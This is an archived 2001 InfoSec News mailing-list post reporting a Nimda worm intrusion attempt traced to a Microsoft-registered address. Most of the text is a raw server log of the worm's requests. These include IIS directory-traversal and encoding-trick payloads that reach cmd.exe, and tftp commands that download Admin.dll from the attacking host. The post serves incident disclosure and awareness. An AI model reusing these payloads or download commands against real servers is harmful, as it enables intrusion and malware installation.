[ISN] Microsoft's Early Xmas Present.

From: InfoSec News (isnat_private)
Date: Fri Dec 28 2001 - 20:21:10 PST


Forwarded from: Jay D. Dyson <jdysonat_private>

Also sent to SecurityFocus's Incidents list.

-----BEGIN PGP SIGNED MESSAGE-----

Hi folks,

	Normally I wouldn't be sending this out, but I figure folks need
to be aware and wary, considering the origin of this intrusion attempt.

	I received an early Xmas present from Microsoft.  No, I didn't get
XP, nor did I get the latest Office software suite.

	I got a Nimda intrusion attempt.

	Early Bird[1] picked up on this intrusion attempt and immediately
notified Microsoft.  I've yet to hear back from Microsoft as to why this
attack from their network came to pass[2].

	For those who are interested, here's the log excerpt. 

208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"

$ whois -h whois.arin.net 208.229.100.126

Microsoft Labs (NETBLK-UU-208-229-100-D1)
   One Microsoft Way
   Redmond, WA 98052
   US

   Netname: UU-208-229-100-D1
   Netblock: 208.229.100.0 - 208.229.101.255

   Coordinator:
      Steig, Rick  (RS8676-ARIN)  a-rickstat_private
      (425) 703-3061

   Record last updated on 03-Nov-1997.
   Database last updated on  27-Dec-2001 19:55:32 EDT.

- -Jay

1.	http://www.treachery.net/earlybird/
2.	If anyone from Microsoft is reading this, I'd appreciate something
	more pleasant next holiday season.  (FYI, the machine you hit ran
	XP for only 15 seconds.  It now runs Linux.)

   (    (                                                        _______
   ))   ))   .-"There's always time for a good cup of coffee"-.   >====<--.
 C|~~|C|~~| (>----- Jay D. Dyson -- jdysonat_private -----<) |    = |-'
  `--' `--'  `---------- Si vis pacem, para bellum. ----------'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBPC0YPrlDRyqRQ2a9AQFXDAQAoXxjVbh6fTzpUPyQFB8aJGpxOLg/+Om+
1Zck8Fw7/tfKsq97YLSqSsp2r4Q5+ybQqXxdnbLVgVsPhKhazzXNrcPKWXhYQU8q
BYT1edg658tvKND0I5NeWoU+vzqzR0NPtppmBKCEMlwz+zG2Nz3nTzT7jMpzmxPo
uNDtpRKBcGs=
=9DpW
-----END PGP SIGNATURE-----



-
ISN is currently hosted by Attrition.org

To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY
of the mail.



This archive was generated by hypermail 2b30 : Sat Dec 29 2001 - 01:19:18 PST